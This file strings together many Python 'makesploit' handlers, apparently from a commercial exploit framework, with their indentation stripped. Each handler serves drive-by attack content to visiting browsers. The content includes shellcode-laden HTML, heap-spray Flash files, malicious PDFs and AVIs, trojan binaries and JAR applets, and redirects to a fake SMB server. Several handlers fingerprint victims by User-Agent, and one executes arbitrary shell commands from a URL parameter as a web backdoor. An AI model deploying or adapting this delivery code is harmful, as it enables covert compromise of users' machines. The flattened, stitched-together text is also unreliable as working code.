def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
# header is used to store request and reponse headers
header=header('SERVER')
body=body()
# Clientd gives us a lot of information about the remote endpoint
if self.plugin_info:
# Check if the remote endpoint is vulnerable to our exploit
if self.is_vulnerable(self.plugin_info)==0:
self.log('Bailing on this client as it is not likely to be vulnerable')
#Return a 404 here?
return None,None
if clientheader.URL.count(self.filename):
self.log('%s: Serving HTML file'%self.name)
# Create the shellcode (self.shellcode)
self.createShellcode()
# Create the HTML Contents
html=self.makefile(request_header=clientheader)
if not html:
self.log("%s: Error creating HTML for this exploit"%self.name)
return None, None #done
body.setBody(html)
header.addHeader('Content-Type','text/html')
header.addHeader('Set-Cookie','SessionID=%d'%(self.jsObfuscator.getXORKey()))
else:
self.log('%s: Redirecting to self'%self.name)
header.status='302'
header.addHeader('Location',self.filename)
header.addHeader('Content-Type','text/html')
return header,body
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header('SERVER')
b=body()
user_agent=clientheader.getStrValue(['User-Agent'])
self.log('User agent of connecting host: %s'%user_agent)
if clientheader.URL.count(self.filename):
#the exploit
self.log('Sending the MS06-24 attack html file')
sploitstring=self.makefile()
b.setBody(sploitstring)
h.addHeader('Content-Type','text/html')
elif clientheader.URL.count(self.downloadfilename):
self.log('Sending the evil skin file')
sploitstring=self.makedownloadfile()
self.log('Sending %d bytes'%len(sploitstring))
h.addHeader('Content-type','binary/octet-stream')
h.addHeader('Connection','close')
b.setBody(sploitstring)
else:
#redirect to self
self.log('redirecting to self')
h.status='302'
h.addHeader('Location',self.filename)
h.addHeader('Content-Type','text/html')
return h,b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if clientheader.URL.count(self.filename):
sploitstring = self.makefile()
b.setBody(sploitstring)
elif clientheader.URL.count(self.trojanname):
self.maketrojan()
self.log("Sending MOSDEF trojan")
f = open(self.trojanname, "rb")
sploitstring = f.read()
f.close()
os.remove(self.trojanname)
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "binary/octet-stream")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
else:
self.log('Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'binary/octet-stream')
return h, b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if clientheader.URL.count(self.filename):
self.log("Sending HTML file: %s" % (self.filename))
self.maketrojan()
sploitstring = self.makefile()
b.setBody(sploitstring)
elif clientheader.URL.count(self.pcbfile):
self.log("Sending PCB file")
f = open(
os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_autovue/" +
self.pcbfile, "rb")
sploitstring = f.read()
f.close()
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "binary/octet-stream")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
else:
self.log('Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'binary/octet-stream')
return h, b
def makesploit(self, clientheader, clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h = header("SERVER")
b = body()
user_agent = clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s" % user_agent)
if user_agent.count("MSIE") == 0:
#still need to determine if it's pretending to be IE by spoofing User-Agent string
self.log("Non IE browser connected - returning None")
return None, None
if user_agent.lower().count("windows nt") == 0:
#all the supported versions are NT based
return None, None
#the ugliest python line ever
windowsver = user_agent.lower().split("windows nt ")[1].split(
";")[0].split(")")[0]
#send the exploit
self.log("Sending the GOMPlayer attack html file")
sploitstring = self.makefile(windowsver)
if not sploitstring:
return None, None
b.setBody(sploitstring)
return h, b
def makesploit(self,clientheader,clientbody):
from libs.spkproxy import header,body
h=header('SERVER')
b=body()
if clientheader.URL.count(self.htmlfilename):
self.log('Serving HTML file')
b.setBody(self.makeHTML())
h.addHeader('Content-Type','text/html')
elif clientheader.URL.count(self.jsfilename):
self.log('Serving JS file')
b.setBody(self.makeJS())
h.addHeader('Content-Type','text/javascript')
elif clientheader.URL.count(self.dest_heapspray):
self.log('Serving SWF heapspray')
self.createShellcode()
b.setBody(self.makeSWF())
h.addHeader('Content-Type','application/x-shockwave-flash')
elif clientheader.URL.count(self.dest_trigger):
self.log('Serving SWF trigger')
b.setBody(file(self.source_trigger,"rb").read())
h.addHeader('Content-Type','application/x-shockwave-flash')
elif clientheader.URL.count(self.dest_pdf):
self.log('Serving PDF file')
self.createShellcode()
b.setBody(self.makePDF())
h.addHeader('Content-Type','application/pdf')
else:
self.log('redirecting to self')
h.status='302'
h.addHeader('Location',self.htmlfilename)
h.addHeader('Content-Type','text/html')
return h,b
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
cookies = clientheader.getStrValue(['Cookie'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
if clientheader.URL.count(self.filename):
data = self.makefile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
user_agent=clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s"%user_agent)
if user_agent.count("MSIE")==0:
#still need to determine if it's pretending to be IE by spoofing User-Agent string
self.log("Non IE browser connected - returning None")
return None,None
if user_agent.lower().count("windows nt") == 0:
#all the supported versions are NT based
return None,None
#send the exploit
self.log("Sending the msparsing_xml attack html file")
sploitstring=self.makefile( clientheader )
if not sploitstring:
return None,None
b.setBody(sploitstring)
if "<html>" in sploitstring.lower():
h.addHeader("Content-Type","text/html")
else:
h.addHeader("Content-Type","application/octet-stream")
return h,b
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
user_agent=clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s"%user_agent)
if clientheader.URL.count(self.filename):
#the exploit
self.log("Sending the MS06-24 attack html file")
sploitstring=self.makefile()
b.setBody(sploitstring)
elif clientheader.URL.count(self.downloadfilename):
self.log("Sending the evil skin file")
sploitstring=self.makedownloadfile()
self.log("Sending %d bytes"%len(sploitstring))
h.addHeader("Content-type","binary/octet-stream")
h.addHeader("Connection","close")
b.setBody(sploitstring)
else:
#redirect to self
self.log("redirecting to self")
h.status="302"
h.addHeader("Location",self.filename)
h.addHeader("Content-Type","text/html")
return h,b
def makesploit(self, clientheader, clientbody):
"""
Called automatically
"""
from libs.spkproxy import header, body
# header is used to store request and reponse headers
header = header('SERVER')
body = body()
if clientheader.URL.count(self.filename):
self.log('Serving HTML file')
# Create the shellcode (self.shellcode)
self.createShellcode()
# Create the HTML Contents
html = self.makefile(request_header=clientheader)
body.setBody(html)
header.addHeader('Content-Type', 'text/html')
header.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('Redirecting to self')
header.status = '302'
header.addHeader('Location', self.filename)
header.addHeader('Content-Type', 'text/html')
return header, body
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
self.log("Request: "+clientheader.URL)
if clientheader.URL.count(self.filename):
#the exploit
self.log("sending HTML")
self.createShellcode()
sploitstring=self.makefile()
b.setBody(sploitstring)
h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
h.addHeader("Content-Type","text/html")
elif len(clientheader.URL) > 3:
self.log("sending CSS")
sploitstring=self.makecss()
b.setBody(sploitstring)
h.addHeader("Content-Type","text/css")
else:
#redirect to self
self.log("redirecting to self")
h.status="302"
h.addHeader("Location",self.filename)
h.addHeader("Content-Type","text/html")
return h,b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if clientheader.URL.count(self.htmlfilename):
self.log('Serving HTML file')
b.setBody(self.makeHTML())
h.addHeader('Content-Type', 'text/html')
elif clientheader.URL.count(self.jsfilename):
self.log('Serving JS file')
b.setBody(self.makeJS())
h.addHeader('Content-Type', 'text/javascript')
elif clientheader.URL.count(self.swffilename):
self.log("Serving our attack SFW")
flash_version = clientheader.getStrValue(['x-flash-version'])
flash_version = flash_version.replace(',', '.')
for i in range(len(targets)):
if flash_version == targets[i][1]:
self.clientversion = i
break
if self.clientversion == 0:
self.log('Unknown Adobe Flash Player v%s' % (flash_version))
h.status = '404'
return h, b
self.log('Serving SWF file for Adobe Flash Player v%s' %
(flash_version))
self.createShellcode()
b.setBody(self.makeSWF())
h.addHeader('Content-Type', 'application/x-shockwave-flash')
else:
self.log('redirecting to self')
h.status = '302'
h.addHeader('Location', self.htmlfilename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
user_agent=clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s"%user_agent)
if user_agent.count("MSIE")==0:
#still need to determine if it's pretending to be IE by spoofing User-Agent string
self.log("Non IE browser connected - returning None")
return None,None
#send the exploit
self.log("Sending the Speech attack html file")
sploitstring=self.makefile()
if not sploitstring:
return None,None
b.setBody(sploitstring)
return h,b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
# .NET DLL request
if clientheader.URL.count("d2.dll"):
self.log("Sending .NET DLL file")
p = PElib()
sploitstring = p.createDotNETPEFileBuf(
("\x90" * 0xd000) + self.createShellcode(), 0x74000000)
h.addHeader('Content-Type', 'application/octet-stream')
b.setBody(sploitstring)
# AVI file request
elif clientheader.URL.count(self.avifile):
self.log("Sending AVI file")
f = open(
os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_directshow/" +
self.avifile, "rb")
sploitstring = f.read()
f.close()
h.addHeader('Content-Type', 'application/octet-stream')
b.setBody(sploitstring)
# Index file request
else:
sploitstring = self.makefile()
h.addHeader('Content-Type', 'text/html')
b.setBody(sploitstring)
return h, b
def makesploit(self, clientheader, clientbody):
h = header('SERVER')
b = body()
self.rop = self.get_rop()
if clientheader.URL.endswith(self.filename):
self.log('Serving HTML file')
self.createAndEncodeShellcode()
html = self.generate_html()
b.setBody(html)
h.addHeader('Content-Type','application/xhtml+xml')
elif clientheader.URL.count("exit"):
self.log('[-] Max retries reached. Exploit failed')
h.status='302'
h.addHeader('Location',"http://www.google.com")
h.addHeader('Content-Type','text/html')
return h, b
else:
self.log('[+] Redirecting to self')
h.status='302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type','text/html')
return h, b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.binpath = self.argsDict.get("binpath", self.binpath)
if (self.binpath == ""):
self.maketrojan()
if clientheader.URL.count(self.filename):
sploitstring = self.makefile()
b.setBody(sploitstring)
# JAR file request
elif clientheader.URL.count(self.jarfile):
self.log("Sending JAR file")
f = open(
os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_applet/" +
self.jarfile, "rb")
sploitstring = f.read()
f.close()
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "binary/octet-stream")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
# Redirect
else:
self.log('Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'binary/octet-stream')
return h, b
def request_id(self, s):
devlog('http_proxy', 'Handling incoming HTTP request')
clientheader = header(state='SERVER')
devlog('http_proxy', 'Setting header.useSSL to %d' % self.useSSL)
clientheader.useSSL = self.useSSL
if self.useSSL == True:
spike_fd = MyConnection(s, directSSL=True)
ret = spike_fd.startSSLserver()
if ret == False:
print "XXX: SSL handshake failed."
return (None, None, None)
else:
spike_fd = s
ret = clientheader.readdata(spike_fd)
if not ret:
self.log("XXX: connection aborted!?")
return (None, None, None)
if 'X-id' not in clientheader.headerValuesDict:
print repr(clientheader.headerValuesDict)
self.log('This is not a _new_ HTTP MOSDEF client ...')
if clientheader.URL == '/w':
self.log("Handling old-style payload backwards compatibility")
self.backwards_compatible(clientheader, spike_fd)
else:
self.log('Unknown HTTP client header:')
print repr(clientheader)
return (None, None, None)
client_id = clientheader.getStrValue(['X-id'])
return (clientheader, client_id, spike_fd)
def handle(self, infd):
self.log("[D2] Handling connection")
clientheader = header(state = "SERVER")
clientheader.ssl = self.ssl
ret = clientheader.readdata(infd)
clientbody = body()
if clientheader.gotGoodHeader():
if clientheader.bodySize()>0 or clientheader.wasChunked:
self.log("[D2] Reading body")
clientbody.read(infd, clientheader.bodySize(), clientheader.wasChunked, 0)
self.log("[D2] Read body")
self.log("[D2] Creating exploit response")
servheader,servbody = self.makesploit(clientheader,clientbody)
self.log("[D2] Responding")
bodydata="".join(servbody.data)
response = ""
response += "%s %s %s\r\n"%(servheader.version, servheader.status, servheader.msg)
self.log(response)
for akey in servheader.headerValuesDict.keys():
if akey not in [ "Content-Length", "Content-length"]:
response += servheader.grabHeader(akey)
self.log("[D2] Sending header data of %d bytes"%len(response))
chunked=0
if not chunked:
response+="Content-Length: "+str(len(bodydata))+"\r\n"
response+="\r\n"
response+="".join(bodydata)
self.log("[D2] Total response length is %d bytes"%len(response))
try:
infd.sendall(response)
except socket.error:
self.log("[D2] Connection closed by peer")
self.log("[D2] Response sent")
infd.close()
return
def makesploit(self, clientheader, clientbody):
h = header('SERVER')
b = body()
# set up the browser target
ua = clientheader.getHeaderValue('User-Agent')
if self.plugin_info:
info_dict = self.plugin_info
self.log("We got a plugin info for this target - thanks clientd!")
if self.is_vulnerable(self.plugin_info):
self.log("This client is most likely vulnerable!")
else:
self.log(
"Bailing on this client as it is not likely to be vulnerable (%s)"
% self.plugin_info.get("language"))
return None, None
if clientheader.URL.count(self.filename):
self.log('Serving stage 1 HTML file')
self.createAndEncodeShellcode()
stage1html = self.makefile(request_header=clientheader, stage=1)
b.setBody(stage1html)
h.addHeader('Content-Type', 'text/html')
else:
self.log('redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self, clientheader, clientbody):
# Start fake SMB server
self.smblock = threading.Lock()
self.smbinit = 0
t = smbServerThread(self)
t.start()
self.threads += [t]
time.sleep(1)
self.smblock.acquire()
if self.smbinit != 1:
self.state = self.HALT
self.log("Could not listen on port 445. You should be running as root!")
return 0
self.smblock.release()
# Make trojan
self.maketrojan()
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if clientheader.URL.count(self.filename):
self.createShellcode()
sploitstring = self.makefile()
b.setBody(sploitstring)
else:
self.log('Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'binary/octet-stream')
return h, b
def makesploit(self, clientheader, clientbody):
"""
For use by exploits/httpserver/httpserver.py -O singleexploit:runcommand -O blind:1
This is useful as a simple www backdoor (probably not used)
but more likely used for demonstrating and testing
our CommandLineExecuter abilities.
"""
from libs.spkproxy import header, body
import urllib
h = header("SERVER")
b = body()
user_agent = clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s" % user_agent)
clientheader.normalize()
command = urllib.unquote_plus(
clientheader.URLargsDict.get("command", ""))
self.log("URLArgs: %s" % clientheader.URLargsDict)
self.log("Executing command: %s" % command)
result = os.popen2(command)[1].read()
if self.blind:
self.log("Blind, so just returning ok")
sploitstring = "ok"
else:
self.log("Non-blind, getting result")
sploitstring = result
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", self.datatype)
h.addHeader("Connection", "close")
b.setBody(sploitstring)
return h, b
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
user_agent=clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s"%user_agent)
if ".jar" in clientheader.URL:
f = open(os.path.join("Resources","javanode.jar"),"rb")
sploitstring = f.read()
f.close()
h.addHeader("Content-Type","application/octet-stream")
elif ".odb" in clientheader.URL:
sploitstring = self.makefile()
h.addHeader("Content-Type","application/vnd.oasis.opendocument.database")
else:
#redirect to self
self.log("redirecting to self")
h.status="302"
h.addHeader("Location",self.filename)
h.addHeader("Content-Type","text/html")
return h,b
self.log("Sending %d bytes"%len(sploitstring))
h.addHeader("Connection","close")
b.setBody(sploitstring)
return h,b
def makesploit(self, clientheader, clientbody):
# we are platform independent
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
user_agent = clientheader.getStrValue(['User-Agent'])
self.log("[+] User agent of connecting host: %s" % user_agent)
if clientheader.URL.count(self.htmlfile):
self.log("[+] Sending HTML")
b.setBody(self.makefile())
elif clientheader.URL.count(self.jarfile):
self.log("[+] Sending JAR")
data = self.makedownloadfile()
self.log("[+] Sending %d bytes" % len(data))
h.addHeader('Content-type', 'binary/octet-stream')
h.addHeader('Connection', 'close')
b.setBody(data)
else:
self.log("[+] Redirect to %s" % self.htmlfile)
h.status = '302'
h.addHeader('Location', self.htmlfile)
h.addHeader('Content-Type', 'text/html')
return h,b
def makesploit(self,clientheader,clientbody):
from libs.spkproxy import header,body
h=header('SERVER')
b=body()
if self.plugin_info:
info_dict=self.plugin_info
self.log("We got a plugin info for this target - thanks clientd!")
if self.is_vulnerable(self.plugin_info):
self.log("This client is most likely vulnerable!")
#check for IE 6
if info_dict['user_agent'].count('MSIE 6'):
self.msie6 = True
else:
self.msie6 = False
else:
self.log("Bailing on this client as it is not likely to be vulnerable (%s)"%self.plugin_info.get("language"))
return None, None
if clientheader.URL.count(self.filename):
self.log('Serving HTML file')
self.createShellcode()
sploitstring=self.makefile(request_header = clientheader)
b.setBody(sploitstring)
h.addHeader('Content-Type','text/html')
h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('redirecting to self')
h.status='302'
h.addHeader('Location',self.filename)
h.addHeader('Content-Type','text/html')
return h,b
def makesploit(self, clientheader, clientbody):
"""
Construct the attack
"""
import threading
import time
self.smblock = threading.Lock()
self.smbinit = 0
self.SMBthr = threading.Thread(target=self.setupSMBServer)
self.SMBthr.start()
time.sleep(1)
self.smblock.acquire()
if self.smbinit != 1:
raise Exception, "Could not listen on port 445. You should be running as administrator/root"
self.smblock.release()
from libs.spkproxy import header, body
h = header("SERVER")
b = body()
#redirect to smbserver
self.log("redirecting to smbserver")
h.status = "302"
h.addHeader("Location", "\\\\%s\\NamedPipe\\foo" % self.callback.ip)
h.addHeader("Content-Type", "foo/moo")
return h, b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.maketrojan()
if clientheader.URL.count("jconsole"):
self.log("Sending HTML page")
sploitstring = self.makefile()
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Connection", "close")
b.setBody(sploitstring)
elif clientheader.URL.count(self.trojanname):
self.log("Sending MOSDEF trojan")
f = open(self.trojanname, "rb")
sploitstring = f.read()
f.close()
os.remove(self.trojanname)
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "binary/octet-stream")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
return h, b
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit file')
data = self.makefile()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if self.plugin_info:
info_dict = self.plugin_info
self.log("We got a plugin info for this target - thanks clientd!")
if self.is_vulnerable(info_dict):
self.log("This client is most likely vulnerable!")
else:
self.log(
"Bailing on this client as it is not likely to be vulnerable."
)
return None, None
if clientheader.URL.count(self.filename):
self.log('Serving HTML file')
sploitstring = self.makefile()
b.setBody(sploitstring)
h.addHeader('Content-Type', 'text/html')
#h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
if "MSIE 5." in clientheader.getHeaderValue("User-Agent"):
self.log("MSIE 5. found. Serving blank header/body")
return h,b
if clientheader.URL.count( self.cab_file ):
# The CAB file was requested.
self.log("Redirecting to CAB file for installation.")
h.addHeader("Content-Type","binary/octet-stream")
cabfd = open( os.path.join(self.engine.config["canvas_resources"],self.cab_file), "rb" )
cab = cabfd.read()
cabfd.close()
b.setBody( cab )
else:
# Serve up our HTML page that loads the ActiveX
self.log("Serving HTML page to load ActiveX")
sploitstring=self.makefile()
self.log("File: %s"%sploitstring)
b.setBody(sploitstring)
return h,b
def web_makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
#make the HTML response page
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
user_agent=clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s"%user_agent)
if user_agent.count("MSIE")==0 and user_agent.count("Firefox")==0:
self.log("Non IE browser connected - returning None")
return None,None
#send the exploit
self.log("Sending the Quicktime 7.3 RTSP attack html file")
sploitstring=self.makefile()
if not sploitstring:
return None,None
b.setBody(sploitstring)
return h,b
